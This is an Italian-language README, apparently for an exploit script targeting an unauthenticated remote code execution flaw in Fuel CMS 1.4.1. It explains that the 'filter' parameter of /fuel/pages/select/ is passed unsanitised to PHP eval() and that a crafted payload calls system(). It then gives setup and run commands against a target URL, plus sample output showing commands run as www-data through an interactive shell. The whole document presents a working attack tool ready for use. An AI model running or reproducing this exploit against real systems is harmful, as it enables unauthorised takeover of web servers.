
Vulnerabilità RCE non autenticata in Fuel CMS 1.4.1.
Vulnerabilità RCE non autenticata in Fuel CMS 1.4.1. Il parametro
filternell'endpoint/fuel/pages/select/viene passato senza sanitizzazione a una chiamataeval()nel backend PHP, consentendo l'esecuzione arbitraria di codice tramite un payload appositamente costruito. A differenza delle iniezioni cieche, l'output viene riflesso direttamente nella risposta HTTP, quindi non è necessario alcun file intermedio.
/fuel/pages/select/ con un payload filter appositamente costruito che chiama system() di PHP con il comando desiderato.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
Esempio:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit